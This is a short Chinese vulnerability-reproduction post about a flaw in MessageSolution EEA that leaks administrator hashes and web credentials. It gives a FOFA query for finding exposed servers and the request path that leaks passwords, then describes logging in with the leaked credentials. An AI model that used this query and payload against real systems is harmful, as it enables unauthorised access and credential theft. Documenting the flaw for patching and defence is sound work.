0x01 前言
MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。
0x02 漏洞影响
MessageSolution 企业邮件归档管理系统EEA
0x03 漏洞复现
FOFA语句
title="MessageSolution Enterprise Email Archiving (EEA)"
PAYLOAD:
http://ip/authenticationserverservlet/
直接访问如下,会看到泄露的账号密码
利用泄露的账号密码登录系统
验证脚本
0x04 参考链接
https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ
【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
本文始发于微信公众号(洞见网安):【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论